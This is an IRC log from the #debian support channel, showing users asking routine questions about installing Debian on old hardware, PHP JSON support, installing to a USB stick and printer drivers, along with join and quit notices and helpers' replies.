07:18 | -!- | sotto [~SoTTo@LAubervilliers-153-53-17-74.w217-128.abo.wanadoo.fr] has joined #debian |
07:19 | -!- | sotto [~SoTTo@LAubervilliers-153-53-17-74.w217-128.abo.wanadoo.fr] has left #debian [] |
07:19 | -!- | gabri [~gabri@165.Red-88-26-158.staticIP.rima-tde.net] has joined #debian |
07:21 | -!- | perry [~perry@115.249.193.53] has quit [Quit: Leaving] |
07:21 | -!- | chaudhary [~perry@115.249.193.53] has quit [Remote host closed the connection] |
07:22 | -!- | bernat [~bernat@91.Red-83-36-134.dynamicIP.rima-tde.net] has quit [Quit: Ex-Chat] |
07:22 | -!- | Paulo [~paulovaz@187.59.241.173] has joined #debian |
07:23 | -!- | anton938 [~anton@gate-ext.inp.nsk.su] has quit [Quit: Leaving] |
07:26 | -!- | PTKDev [~PTKDev@wireless-142-159.net.uniroma2.it] has quit [Remote host closed the connection] |
07:27 | -!- | dtw [dtw@dsl-roibrasgw1-fe84fb00-215.dhcp.inet.fi] has quit [Quit: ERC Version 5.3 (IRC client for Emacs)] |
07:27 | -!- | gabri [~gabri@165.Red-88-26-158.staticIP.rima-tde.net] has quit [Quit: Saliendo] |
07:28 | -!- | dtw [dtw@dsl-roibrasgw1-fe84fb00-215.dhcp.inet.fi] has joined #debian |
07:29 | -!- | Black_Prince [~Prince@91.191.20.15] has joined #debian |
07:30 | -!- | lorth [~lorth@162-10-142-46.pool.kielnet.net] has quit [Quit: quit] |
07:39 | -!- | alibungker [~sd@125.162.29.34] has joined #debian |
07:40 | -!- | alibungker [~sd@125.162.29.34] has quit [] |
07:41 | -!- | Otteoke [~Otteoke@cm213.sigma1.maxonline.com.sg] has quit [Quit: Leaving] |
07:42 | -!- | EagleScreen [~quassel@80.31.188.188] has quit [Ping timeout: 480 seconds] |
07:42 | -!- | xharx__ [~xharx@port-92-205-36-112.dynamic.qsc.de] has quit [Ping timeout: 480 seconds] |
07:44 | -!- | Volley [~worf@chello080109200187.3.sc-graz.chello.at] has joined #debian |
07:45 | -!- | steeb [~steeb@jabberd.draugr.de] has left #debian [] |
07:45 | -!- | ribe [~riberto@c-98-254-100-215.hsd1.fl.comcast.net] has joined #debian |
07:46 | <ribe> | cuba33ci, you there? |
07:47 | -!- | a_landim_xhkl [~Andre@poseidon.cais.rnp.br] has quit [Read error: Connection reset by peer] |
07:47 | -!- | fanto666 [~fantomas@fantomas.fantomas.sk] has left #debian [] |
07:49 | -!- | a_landim_xhkl [~Andre@poseidon.cais.rnp.br] has joined #debian |
07:50 | -!- | mode/#debian [+l 484] by debhelper |
07:54 | -!- | jet__ [~jet@12-127-132-95.pool.ukrtel.net] has joined #debian |
07:54 | -!- | jet__ [~jet@12-127-132-95.pool.ukrtel.net] has quit [autokilled: This host may be infected. Mail support@oftc.net with questions. BOPM (2012-02-08 12:54:32)] |
07:55 | -!- | phoenix [~phoenix@93-45-219-143.ip104.fastwebnet.it] has joined #debian |
07:55 | -!- | phoenix [~phoenix@93-45-219-143.ip104.fastwebnet.it] has left #debian [] |
07:56 | -!- | degli [~degli@host67-61-dynamic.57-82-r.retail.telecomitalia.it] has joined #debian |
07:56 | -!- | prem [~prem@218.248.25.99] has quit [Remote host closed the connection] |
07:58 | <Infiltrator> | ribe: Is it cuba or you that needs help? |
07:58 | -!- | broucaries [~bastien@phy1.landsofr00t.eu] has joined #debian |
08:01 | -!- | angelabad [~angel@150.Red-83-42-114.dynamicIP.rima-tde.net] has quit [Remote host closed the connection] |
08:01 | -!- | jet_ [~jet@120-171-135-95.pool.ukrtel.net] has quit [Ping timeout: 480 seconds] |
08:01 | <ribe> | I'm ok guy, just trying to contact Cuba33ci |
08:03 | <ribe> | Infiltrator, Thanks! |
08:03 | <XayOn> | Infiltrator: "Cuba needs help", I lol'd |
08:05 | <Infiltrator> | ribe: You might want to try /msg then. |
08:05 | <ribe> | XayOn, well we all know the country is in dier need of mayor help, but I was trying to contact the user cuba33ic |
08:06 | -!- | steeb [~steeb@jabberd.draugr.de] has joined #debian |
08:06 | <ribe> | Infiltrator, he may be busy or not near his machine? I have sent him a couple of messages, I don't want to be a PEST!!! |
08:06 | <Infiltrator> | Okay, point taken. :P |
08:07 | <ribe> | Infiltrator, I value and THANK you for your help!!! |
08:08 | -!- | mosno [~mosno@c114-77-11-48.brasd3.vic.optusnet.com.au] has joined #debian |
08:08 | <Infiltrator> | I really can't tell if he's being sarcastic. :\ |
08:08 | -!- | fred_ [~fred@sjo68-2-82-244-178-77.fbx.proxad.net] has joined #debian |
08:09 | <XayOn> | ribe: Then stop being a pest. Sending him several messages and then trying to get to him trough a public channel is not going to help. |
08:09 | <XayOn> | It is, in fact, quite unpolite. |
08:10 | <ribe> | XayOn, the messages have been one yesterday and one today. I don't think that is an excess or being a pest! |
08:11 | <XayOn> | ribe: It was you who said it, not me. "Couple of messages" is not two messages, one at a day. |
08:11 | <ribe> | Infiltrator, I wan not trying to be sarcastic, I truly appreciate your input. |
08:12 | -!- | fred_ [~fred@sjo68-2-82-244-178-77.fbx.proxad.net] has quit [Remote host closed the connection] |
08:13 | -!- | muhammed [~user@14.140.179.22] has joined #debian |
08:13 | -!- | Se-bash [~seba@host140.200-82-88.telecom.net.ar] has joined #debian |
08:13 | <muhammed> | hi |
08:14 | <ribe> | hi muhammed |
08:15 | -!- | artista_frustrado [~fernando@200.247.43.2] has quit [Read error: Connection reset by peer] |
08:16 | <muhammed> | how can i change background image of ubuntu login window |
08:16 | <XayOn> | !ubuntu |
08:16 | <dpkg> | Ubuntu is based on Debian, but it is not Debian. Only Debian is supported on #debian. Use #ubuntu (irc.freenode.net) instead. Even if the channel happens to be less helpful, support for distributions other than Debian is offtopic on #debian. See also <based on debian>. |
08:16 | <XayOn> | muhammed: /join #ubuntu and then ask them. |
08:17 | -!- | kernevil_ [~kernevil@80.174.249.84.dyn.user.ono.com] has joined #debian |
08:17 | -!- | kernevil_ [~kernevil@80.174.249.84.dyn.user.ono.com] has quit [] |
08:17 | -!- | artista_frustrado [~fernando@200.247.43.2] has joined #debian |
08:17 | <muhammed> | k |
08:17 | <muhammed> | thank u |
08:17 | -!- | muhammed [~user@14.140.179.22] has quit [] |
08:17 | -!- | smb [~smb@vserver95.orion.retrosnub.co.uk] has quit [Server closed connection] |
08:17 | -!- | smb [~smb@vserver95.orion.retrosnub.co.uk] has joined #debian |
08:18 | -!- | Blacker47 [~Blacker47@p57A909DD.dip0.t-ipconnect.de] has joined #debian |
08:19 | -!- | janne_ [~janne@dsl-trebrasgw1-ff4bc100-14.dhcp.inet.fi] has joined #debian |
08:20 | -!- | janos_ [~janos@93-87-213-144.dynamic.isp.telekom.rs] has joined #debian |
08:25 | -!- | Paulo [~paulovaz@187.59.241.173] has quit [Quit: Saindo] |
08:26 | -!- | janne_ [~janne@dsl-trebrasgw1-ff4bc100-14.dhcp.inet.fi] has quit [Quit: Lähdössä] |
08:27 | -!- | ribe [~riberto@c-98-254-100-215.hsd1.fl.comcast.net] has quit [Quit: Ex-Chat] |
08:30 | -!- | Georg [~georg@dial-95-105-174-153-orange.orange.sk] has joined #debian |
08:30 | -!- | Paulo [~paulovaz@187.59.241.173] has joined #debian |
08:31 | -!- | Georg [~georg@dial-95-105-174-153-orange.orange.sk] has quit [] |
08:31 | -!- | Caroll [~caroll@189.123.216.170] has joined #debian |
08:32 | -!- | dominique [~dominique@AOrleans-555-1-80-175.w90-21.abo.wanadoo.fr] has joined #debian |
08:34 | -!- | peyote [~peyote@softbank220022056002.bbtec.net] has joined #debian |
08:34 | -!- | dominique [~dominique@AOrleans-555-1-80-175.w90-21.abo.wanadoo.fr] has quit [Remote host closed the connection] |
08:35 | -!- | peyote [~peyote@softbank220022056002.bbtec.net] has quit [] |
08:36 | -!- | Red_lady [~Red_lady@dslb-084-063-045-074.pools.arcor-ip.net] has joined #debian |
08:37 | -!- | Red_lady [~Red_lady@dslb-084-063-045-074.pools.arcor-ip.net] has left #debian [] |
08:37 | -!- | |Ferderik [~Frederik@78-22-171-222.access.telenet.be] has left #debian [] |
08:39 | -!- | ribe [~riberto@c-98-254-100-215.hsd1.fl.comcast.net] has joined #debian |
08:43 | -!- | Paulo [~paulovaz@187.59.241.173] has quit [Remote host closed the connection] |
08:44 | <ribe> | where can one find out the minimal system requirements to install Debian? |
08:44 | -!- | kowloonboy [~kowloonbo@82.132.242.57] has joined #debian |
08:45 | -!- | Leon_Nardella [~Leon@187.10.248.139] has joined #debian |
08:45 | -!- | jhutchins_lt [~jonathan@64-151-37-66.dyn.everestkc.net] has joined #debian |
08:45 | -!- | staslaki [~staslaki@124.148.206.72] has joined #debian |
08:45 | <staslaki> | hello |
08:46 | -!- | jkf [~Greg_od@85-238-118-157.broadband.tenet.odessa.ua] has joined #debian |
08:47 | <gnugr> | ribe: check this 'http://www.debian.org/releases/squeeze/installmanual' |
08:48 | <ribe> | THANK YOU! |
08:49 | <gnugr> | ribe: you can read also this 'http://www.debian.org/releases/stable/debian-installer' |
08:50 | -!- | mode/#debian [+l 492] by debhelper |
08:51 | -!- | tazz [~gaurav@59.162.86.164] has joined #debian |
08:53 | -!- | staslaki [~staslaki@124.148.206.72] has quit [Quit: Leaving] |
08:53 | -!- | degli [~degli@host67-61-dynamic.57-82-r.retail.telecomitalia.it] has quit [Quit: Leaving] |
08:53 | -!- | MisterFluffy [~MisterFlu@misterfluffy.dsl.xmission.com] has joined #debian |
08:54 | -!- | kevin8t8_ [~kevin8t8@75-170-33-194.eugn.qwest.net] has joined #debian |
08:54 | <ribe> | gnugr, WOW all the way back to a i386, that is impressive! |
08:55 | -!- | digi [~digi@p54B367DF.dip.t-dialin.net] has joined #debian |
08:55 | -!- | kowloonboy [~kowloonbo@82.132.242.57] has quit [Quit: Bye] |
08:56 | -!- | daniel_ [~daniel@p5B10CA61.dip.t-dialin.net] has joined #debian |
08:56 | <themill> | actually, you'd not be able to install debian on a real 386 machine. kernel and libc are compiled for the 486 instruction set |
08:57 | -!- | daniel_ [~daniel@p5B10CA61.dip.t-dialin.net] has quit [] |
08:58 | -!- | digi [~digi@p54B367DF.dip.t-dialin.net] has quit [] |
08:59 | <ribe> | some friends recently aquired a truckfull of older/decommisioned machines we wanted to install debian on them before giving them to local children and student centers |
09:00 | -!- | kevin8t81 [~kevin8t8@71-220-206-218.eugn.qwest.net] has joined #debian |
09:00 | -!- | kevin8t8 [~kevin8t8@75-170-33-235.eugn.qwest.net] has quit [Ping timeout: 480 seconds] |
09:02 | -!- | ribe [~riberto@c-98-254-100-215.hsd1.fl.comcast.net] has quit [Quit: Ex-Chat] |
09:03 | <gdb> | I don't mean to be a spoil sport, but I think providing 386 and 486 class machines to people, even the disadvantaged, does them a disservice. |
09:03 | -!- | xbeatrix [~beatrice@93-47-39-20.ip111.fastwebnet.it] has joined #debian |
09:03 | <gdb> | I suppose that's a topic for off-topic, though. |
09:03 | <xbeatrix> | ciao |
09:04 | -!- | xbeatrix [~beatrice@93-47-39-20.ip111.fastwebnet.it] has left #debian [] |
09:05 | -!- | Se-bash^2 [~seba@host6.190-136-240.telecom.net.ar] has joined #debian |
09:05 | -!- | goncalog [~goncalog@firewall.ctxuk.citrix.com] has joined #debian |
09:06 | -!- | kevin8t8_ [~kevin8t8@75-170-33-194.eugn.qwest.net] has quit [Ping timeout: 480 seconds] |
09:06 | -!- | mentor [~mentor@host81-136-253-116.in-addr.btopenworld.com] has joined #debian |
09:07 | <daemonkeeper> | gdb: It's not anyone would be providing end-users Pre-Pentium-III-era computers anymore. You can get something better literally for free. The rationale are older or less common embedded systems which do use very old chip generations for various reasons. |
09:07 | -!- | Se-bash [~seba@host140.200-82-88.telecom.net.ar] has quit [Ping timeout: 480 seconds] |
09:07 | -!- | Se-bash^2 is now known as Se-bash |
09:10 | -!- | Amxfd [~Amxfd@178.212.216.181] has joined #debian |
09:10 | -!- | Paulo [~paulovaz@187.59.241.173] has joined #debian |
09:11 | -!- | martin_ [~martin@f049041101.adsl.alicedsl.de] has quit [Quit: Leaving] |
09:11 | -!- | txt_file [~txt@i59F6AFE3.versanet.de] has joined #debian |
09:11 | -!- | gruetzkopf [~martin@f049041101.adsl.alicedsl.de] has joined #debian |
09:12 | -!- | Amxfd [~Amxfd@178.212.216.181] has quit [] |
09:12 | -!- | Paulo [~paulovaz@187.59.241.173] has quit [] |
09:12 | -!- | paulo [~paulo@187.59.241.173] has joined #debian |
09:12 | -!- | crshd [~crshd@175.141.9.121] has quit [Quit: So long, and thanks for all the fish] |
09:13 | -!- | josepm [~josepm@140.Red-80-25-20.staticIP.rima-tde.net] has joined #debian |
09:13 | <josepm> | hello |
09:14 | -!- | abdulkarim [~abdulkari@123.237.73.27] has joined #debian |
09:14 | <josepm> | I have problems with an ntfs usb hd 2.5 |
09:14 | <josepm> | externl |
09:16 | -!- | josepm [~josepm@140.Red-80-25-20.staticIP.rima-tde.net] has quit [] |
09:16 | -!- | torjeh [~torjeh@193.157.82.30] has quit [Remote host closed the connection] |
09:17 | -!- | mosno [~mosno@c114-77-11-48.brasd3.vic.optusnet.com.au] has quit [Read error: No route to host] |
09:17 | -!- | the-M [~the-M@TK212017102073.teleweb.at] has quit [Remote host closed the connection] |
09:18 | -!- | rokemen8 [~pedro@84.122.193.57.dyn.user.ono.com] has joined #debian |
09:19 | -!- | rokemen8 [~pedro@84.122.193.57.dyn.user.ono.com] has quit [] |
09:19 | <gdb> | daemonkeeper: Ah, meaning these machines would be used as things like print servers, routers, firewalls, low volume file services, or other roles where the "end user experience" of the machine's performance is immaterial. |
09:20 | <gdb> | Sounds good then! :-) |
09:21 | -!- | steeb [~steeb@jabberd.draugr.de] has left #debian [] |
09:22 | -!- | steeb [~steeb@jabberd.draugr.de] has joined #debian |
09:22 | -!- | steeb [~steeb@jabberd.draugr.de] has left #debian [] |
09:23 | -!- | Pretender [~Pretender@dslb-084-059-136-040.pools.arcor-ip.net] has joined #debian |
09:23 | -!- | steeb [~steeb@jabberd.draugr.de] has joined #debian |
09:23 | -!- | Pretender [~Pretender@dslb-084-059-136-040.pools.arcor-ip.net] has left #debian [] |
09:23 | -!- | steeb [~steeb@jabberd.draugr.de] has left #debian [] |
09:23 | -!- | Han [~han@boetes.org] has joined #debian |
09:23 | -!- | TuanAdan [~d3b@222.124.186.246] has joined #debian |
09:24 | <Han> | How do I get json support for php on squeeze? |
09:24 | -!- | drewdavis [~devious@208.100.191.216] has joined #debian |
09:27 | <gnugr> | Han: read this 'http://packages.debian.org/squeeze/php-services-json' |
09:27 | -!- | mosno [~mosno@c114-77-11-48.brasd3.vic.optusnet.com.au] has joined #debian |
09:27 | -!- | Miguel0n [~miguel@38.161.78.188.dynamic.jazztel.es] has joined #debian |
09:27 | -!- | helty [~undead@tor.cinipac.net] has joined #debian |
09:27 | <Han> | gnugr, you did the same google as I did. Allas that does not enable json support for php |
09:28 | -!- | ytrh [~yo@85.136.173.2.dyn.user.ono.com] has joined #debian |
09:28 | -!- | ytrh [~yo@85.136.173.2.dyn.user.ono.com] has quit [] |
09:28 | -!- | ribe [~riberto@c-98-254-100-215.hsd1.fl.comcast.net] has joined #debian |
09:30 | <Han> | php -m does show json support enabled... |
09:30 | -!- | broucaries [~bastien@phy1.landsofr00t.eu] has quit [Read error: Connection reset by peer] |
09:30 | -!- | TuanAdan1 [~d3b@222.124.186.246] has joined #debian |
09:31 | -!- | TuanAdan [~d3b@222.124.186.246] has quit [Read error: Connection reset by peer] |
09:31 | -!- | ultr [~ultr@aaie219.neoplus.adsl.tpnet.pl] has joined #debian |
09:31 | -!- | TuanAdan1 is now known as TuanAdan |
09:31 | -!- | bonsai [~bonsai@p54A12BAE.dip.t-dialin.net] has quit [Ping timeout: 480 seconds] |
09:32 | <themill> | Han: json is built in to the debian php packages |
09:32 | <Han> | It is indeed. It appears to be a bug in joomla |
09:32 | -!- | gusnan [~gusnan@h205n3c1o269.bredband.skanova.com] has quit [Ping timeout: 480 seconds] |
09:33 | -!- | melmothX [~melmoth@93-137-178-207.adsl.net.t-com.hr] has joined #debian |
09:33 | <themill> | situation normal then |
09:33 | -!- | semko [~semko@dhcp-186-46.gjk.dk] has joined #debian |
09:34 | <Han> | Sorry for the nois :-} |
09:34 | -!- | sid_ [~sid@pc-244-123-214-201.cm.vtr.net] has joined #debian |
09:35 | -!- | sid_ is now known as tolxief |
09:35 | -!- | Mixer [nouser@vpn.mydevil.net] has joined #debian |
09:35 | -!- | ultr [~ultr@aaie219.neoplus.adsl.tpnet.pl] has quit [] |
09:35 | -!- | Mixer [nouser@vpn.mydevil.net] has quit [] |
09:35 | <semko> | hey guys |
09:35 | <semko> | can i remove default gnome programs like evolution, epiphany etc. without breaking gnome? |
09:35 | <semko> | for synaptic says that it will remove gnome! |
09:36 | -!- | gusnan [~gusnan@h25n3c1o269.bredband.skanova.com] has joined #debian |
09:37 | -!- | ribe [~riberto@c-98-254-100-215.hsd1.fl.comcast.net] has quit [Quit: Ex-Chat] |
09:37 | -!- | priv1 [~private@HSI-KBW-078-043-166-046.hsi4.kabel-badenwuerttemberg.de] has joined #debian |
09:38 | -!- | steeb [~steeb@jabberd.draugr.de] has joined #debian |
09:38 | -!- | towo` [~torsten_w@178-24-37-129-dynip.superkabel.de] has joined #debian |
09:38 | -!- | PTKDev [~PTKDev@wireless-142-159.net.uniroma2.it] has joined #debian |
09:38 | -!- | lduros [~lduros@dhcp0641.nic.resnet.group.upenn.edu] has joined #debian |
09:40 | -!- | mode/#debian [+l 502] by debhelper |
09:40 | -!- | TuanAdan1 [~d3b@222.124.186.246] has joined #debian |
09:41 | -!- | bonsai [~bonsai@p54A12A63.dip.t-dialin.net] has joined #debian |
09:43 | -!- | TuanAdan [~d3b@222.124.186.246] has quit [Ping timeout: 480 seconds] |
09:43 | -!- | txt_file [~txt@i59F6AFE3.versanet.de] has quit [Ping timeout: 480 seconds] |
09:44 | -!- | jmr [~Adium@border.exmeritus.com] has joined #debian |
09:45 | -!- | cyril [~cyril@eka-178-20-70-2.ftto.ovea.com] has joined #debian |
09:45 | -!- | hggdh [~hggdh@pool-96-226-214-253.dllstx.fios.verizon.net] has quit [Quit: WeeChat 0.3.7-rc1] |
09:46 | -!- | semko [~semko@dhcp-186-46.gjk.dk] has quit [Quit: Leaving] |
09:47 | <gnugr> | Han: you still here? |
09:47 | -!- | jhutchins_wk [~jhutchins@216.58.251.226] has joined #debian |
09:47 | -!- | insane-gva [~insane-gv@sgdimac6.epfl.ch] has joined #debian |
09:47 | -!- | paulio [~Paulio@pas001.connectel-cz.com] has left #debian [] |
09:47 | -!- | jmux [~jan-marek@lhm246.muenchen.de] has quit [] |
09:48 | -!- | Iridos [~boo@p57974F8E.dip.t-dialin.net] has joined #debian |
09:49 | -!- | gordon [~gordon@91.206.176.199] has joined #debian |
09:49 | -!- | hggdh [~hggdh@pool-96-226-214-253.dllstx.fios.verizon.net] has joined #debian |
09:49 | -!- | gordon [~gordon@91.206.176.199] has left #debian [] |
09:50 | <gnugr> | Han: one way is to add json.ini into /etc/php.d and then restart apache2 |
09:50 | -!- | gravity [~david@89.145.121.20] has quit [Ping timeout: 480 seconds] |
09:50 | -!- | rtheys [~rtheys@kulnet-nat-2.kulnet.kuleuven.be] has joined #debian |
09:51 | -!- | pleb2 [~pleb2@213.121.242.198] has joined #debian |
09:53 | -!- | txt_file [~txt@88.130.165.129] has joined #debian |
09:55 | -!- | Xavi [~xavi@164.Red-79-157-103.dynamicIP.rima-tde.net] has quit [Ping timeout: 480 seconds] |
09:56 | -!- | tolxief [~sid@pc-244-123-214-201.cm.vtr.net] has quit [Remote host closed the connection] |
09:57 | -!- | mosno [~mosno@c114-77-11-48.brasd3.vic.optusnet.com.au] has quit [] |
09:57 | -!- | mosno [~mosno@c114-77-11-48.brasd3.vic.optusnet.com.au] has joined #debian |
09:59 | -!- | gravity [~david@void.printf.net] has joined #debian |
09:59 | -!- | sev [~sev@95.158.3.90] has quit [Quit: Leaving] |
09:59 | -!- | mosno [~mosno@c114-77-11-48.brasd3.vic.optusnet.com.au] has quit [] |
10:00 | -!- | master22197 [~nick@adsl-171.46.190.123.tellas.gr] has joined #debian |
10:00 | -!- | master22197 [~nick@adsl-171.46.190.123.tellas.gr] has quit [] |
10:00 | -!- | nicholi [~nicholi@rrcs-76-79-196-34.west.biz.rr.com] has quit [Ping timeout: 480 seconds] |
10:01 | -!- | vladuke [~vladuke@87.226.144.85] has quit [Ping timeout: 480 seconds] |
10:02 | -!- | att [~att@186.213.15.165] has joined #debian |
10:02 | -!- | qerter [~qerter@218-173-73-30.dynamic.hinet.net] has joined #debian |
10:02 | -!- | hele [~hele@cs78198129.pp.htv.fi] has joined #debian |
10:05 | -!- | lukasz_gut_ [~Lukasz@eswebprx01x.nokia.com] has quit [Remote host closed the connection] |
10:05 | -!- | gnugr [~vangelis@79.167.78.18] has quit [Quit: WeeChat 0.3.6] |
10:06 | -!- | gunkamanti [~sarefo@213.83.32.130] has quit [Ping timeout: 480 seconds] |
10:06 | -!- | helty [~undead@28IAACLG0.tor-irc.dnsbl.oftc.net] has quit [Remote host closed the connection] |
10:09 | -!- | TuanAdan1 [~d3b@222.124.186.246] has quit [Read error: No route to host] |
10:09 | -!- | TuanAdan [~d3b@222.124.186.246] has joined #debian |
10:10 | -!- | gnugr [~vangelis@79.167.78.18] has joined #debian |
10:10 | -!- | Seb1 [~sebastian@p5091CFC1.dip.t-dialin.net] has joined #debian |
10:12 | -!- | TuanAdan [~d3b@222.124.186.246] has quit [] |
10:14 | -!- | CutMeOwnThroat [~boo@p4FEA58E2.dip.t-dialin.net] has joined #debian |
10:15 | <polluX[W]> | Is it possible to install debian on a laptop from a CD, to a usb stick ? IE : using the usb as hard drive without modifiying the internal drive. |
10:15 | -!- | lorth [~lorth@162-10-142-46.pool.kielnet.net] has joined #debian |
10:15 | -!- | student [~student@78.28.145.2] has joined #debian |
10:16 | <txt_file> | polluX[W]: yes |
10:16 | <polluX[W]> | I found a tutorial for installation from usb, no to usb... |
10:16 | -!- | thkoch [~thkoch@52-188.77-83.cust.bluewin.ch] has quit [Remote host closed the connection] |
10:16 | <txt_file> | I installed debian to a sd card a few weeks ago |
10:17 | -!- | student is now known as grimmy |
10:17 | <polluX[W]> | great, how did you do it ? |
10:18 | <txt_file> | I used the normal installation routine |
10:18 | <txt_file> | there is the usb shown as normal hard disk |
10:18 | <valdyn> | polluX[W]: why do you think an sd card is comparable to usb? |
10:18 | <polluX[W]> | It did not alter the internal drive in any way ? |
10:19 | <grimmy> | polluX[W]: Did you use unetbootin? |
10:19 | -!- | lupine_85 [~lupine@eboracum.office.bytemark.co.uk] has joined #debian |
10:19 | <txt_file> | I did alter the internal drive because I wanted to. otherwise you need to change where the bootloader is installed at the end of the installation |
10:19 | <polluX[W]> | I used nothing yet... just planning to |
10:19 | -!- | Iridos [~boo@p57974F8E.dip.t-dialin.net] has quit [Ping timeout: 480 seconds] |
10:20 | <blast007> | polluX[W]: if you want to be absolutely sure you don't modify the internal drive, take it out during the install ;) |
10:20 | <grimmy> | polluX[W]: if you want to install somethin to usb use that, or find a hybrid iso and use dd command |
10:20 | -!- | grimmy [~student@78.28.145.2] has quit [] |
10:20 | <polluX[W]> | 'that' ? |
10:21 | <blast007> | think he was referring to unetbootin, but that hasn't worked for me consitently |
10:21 | <polluX[W]> | blast007 : since it's a laptop, I dont really want to unscrew it all, but I might end up doing it :) |
10:21 | <blast007> | shouldn't be too many screws for the hard drive |
10:22 | -!- | drewdavis [~devious@208.100.191.216] has quit [Remote host closed the connection] |
10:22 | <blast007> | but in any case, the USB stick should show up as a drive you can install to |
10:22 | -!- | drewdavis [~devious@208.100.191.216] has joined #debian |
10:22 | <txt_file> | depending on the notebook |
10:23 | <blast007> | txt_file: most that I've seen are a screw or two for the cover, and maybe one or two securing the drive |
10:24 | <polluX[W]> | grimmy : what's an hybrid iso ? think I read something about that earlier, i'll try to find it back |
10:24 | -!- | mark76 [~quassel@cpc10-nfds14-2-0-cust293.8-2.cable.virginmedia.com] has joined #debian |
10:25 | -!- | CutMeOwnThroat is now known as Iridos |
10:25 | -!- | A_201 [~A_201@161-238-113-92.pool.ukrtel.net] has joined #debian |
10:25 | -!- | anbe [~andreas@138.246.13.194] has quit [Ping timeout: 480 seconds] |
10:26 | <txt_file> | blast007: my old 15" notebook had 2 screws for the hard drive but my new 10" notebook doesn't even have visible screws (except one for ram) |
10:26 | -!- | ArthurLiu [~arthurliu@krikkit.milliways.fr] has quit [Server closed connection] |
10:26 | -!- | ArthurLiu [~arthurliu@krikkit.milliways.fr] has joined #debian |
10:27 | <blast007> | some HP netbook I just set up here had the entire bottom cover just slide off to access the inside components |
10:27 | <blast007> | then some screws were inside for stuff |
10:27 | -!- | A_201 [~A_201@161-238-113-92.pool.ukrtel.net] has quit [] |
10:29 | <polluX[W]> | blast007 : I got a probook. it has 2 smalls screws. I might have a small screwdriver somewhere. |
10:31 | -!- | Black_Pr1nce [~Prince@91.191.20.15] has joined #debian |
10:31 | -!- | Black_Prince [~Prince@91.191.20.15] has quit [Read error: Connection reset by peer] |
10:32 | -!- | xharx__ [~xharx@p4FFDA7B2.dip.t-dialin.net] has joined #debian |
10:32 | -!- | witchyta [~witchyta@41.85.161.2] has joined #debian |
10:33 | -!- | pavi [~pavi@111.93.14.22] has joined #debian |
10:34 | -!- | XeonBloomfield [~XeonBloom@n02.satfilm.pl] has joined #debian |
10:36 | -!- | fabio [~fabio@227.6.166.178.rev.vodafone.pt] has joined #debian |
10:37 | <fabio> | hi guys |
10:37 | -!- | fabio is now known as Guest1934 |
10:37 | <Guest1934> | i have an dymo labelwriter 400 turbo |
10:37 | <Guest1934> | printer |
10:37 | <Guest1934> | how to get drivers for this? |
10:38 | <Guest1934> | lsusb |
10:38 | <Guest1934> | Bus 002 Device 003: ID 0922:001a Dymo-CoStar Corp. LabelWriter 400 Turbo |
10:38 | -!- | freealan [~freealan@61-217-20-52.dynamic.hinet.net] has joined #debian |
10:40 | -!- | mode/#debian [+l 508] by debhelper |
10:40 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has joined #debian |
10:42 | -!- | araneus [~araneus@88-148-205-116.bb.dnainternet.fi] has quit [Remote host closed the connection] |
10:44 | <Guest1934> | can someone help me? |
10:45 | <dtw> | !anyone |
10:45 | <dpkg> | Please do not ask if anyone can help you, knows 'something' or uses 'some_program'. Instead, ask your real question. (If the real question _was_ "does anyone use 'some_program'?" ask me about <popcon> instead.) See <ask> <ask to ask> <polls> <search> <sicco> <smart questions>. |
10:45 | -!- | thkoch [~thkoch@52-188.77-83.cust.bluewin.ch] has joined #debian |
10:46 | <dtw> | (Ah, sorry, you _did_ ask a question.) I hope somebody can help. |
10:48 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has quit [Read error: Connection reset by peer] |
10:48 | -!- | legnaleurc [~quassel@dblab97.csie.ncu.edu.tw] has joined #debian |
10:48 | -!- | araneus [~araneus@88-148-205-116.bb.dnainternet.fi] has joined #debian |
10:48 | -!- | Amxfd [~Amxfd@178.212.216.181] has joined #debian |
10:48 | -!- | ocams_razor [~ocams_raz@95.57.158.179] has joined #debian |
10:49 | <ocams_razor> | hi |
10:49 | <Guest1934> | dtw lol |
10:49 | -!- | Amxfd [~Amxfd@178.212.216.181] has quit [] |
10:49 | -!- | ocams_razor [~ocams_raz@95.57.158.179] has quit [] |
10:50 | -!- | AbsintheSyringe [~havoc@chello080109101041.3.15.vie.surfer.at] has quit [Ping timeout: 480 seconds] |
10:51 | -!- | witchyta [~witchyta@41.85.161.2] has left #debian [Quitte] |
10:51 | -!- | maxou56800 [~maxou5680@107.154.9.109.rev.sfr.net] has joined #debian |
10:52 | <jhutchins_wk> | Guest1934: Search at http://www.linuxfoundation.org/collaborate/workgroups/openprinting |
10:52 | -!- | bluewater [~nautics-a@203.214.36.67] has quit [Quit: Konversation terminated!] |
10:52 | -!- | flower [~d@178-25-10-1-dynip.superkabel.de] has joined #debian |
10:56 | <polluX[W]> | hmm that's totally off topic, but can coldness cause damage to a computer ? think I got a small one running by -5°c |
10:57 | <blast007> | sure, that could be bad, especially if frost/ice forms on any of the components ;) |
10:58 | -!- | Se-bash [~seba@host6.190-136-240.telecom.net.ar] has quit [Read error: Operation timed out] |
10:58 | -!- | iceman [~y@46-150-47-103.cable.teleing.net] has joined #debian |
10:58 | -!- | XeonBloomfield [~XeonBloom@n02.satfilm.pl] has quit [Remote host closed the connection] |
10:59 | -!- | Slydder [~chuck@intranet.bluedotmedia.de] has quit [Quit: Leaving.] |
10:59 | -!- | liverwurst [~wurst@p508C3F8E.dip.t-dialin.net] has quit [Quit: Konversation terminated!] |
11:00 | <polluX[W]> | Right. somethin to check with condensation. I might shut it down, just in case ... |
11:01 | -!- | mvedelag [~mvedelag@66.43.64.66] has joined #debian |
11:01 | -!- | mvedelag [~mvedelag@66.43.64.66] has quit [] |
11:01 | -!- | graytron [~tero@h-62-142-157-57.joensuunelli.fi] has joined #debian |
11:01 | -!- | iceman [~y@46-150-47-103.cable.teleing.net] has quit [] |
11:01 | -!- | Black_Pr1nce is now known as Black_Prince |
11:01 | -!- | graytron is now known as Guest1936 |
11:01 | -!- | hychen [~hychen@114-32-21-24.HINET-IP.hinet.net] has quit [Quit: Leaving] |
11:02 | -!- | zorro [~zorro@02d86316.bb.sky.com] has joined #debian |
11:03 | -!- | Guest1857 [~tero@h-62-142-157-57.joensuunelli.fi] has quit [Ping timeout: 480 seconds] |
11:03 | -!- | faw [~faw@faw.user.oftc.net] has joined #debian |
11:03 | <zorro> | NeophyteX |
11:04 | -!- | mlundblad [~marcus@193.12.106.2] has quit [Ping timeout: 480 seconds] |
11:04 | <zorro> | hi there |
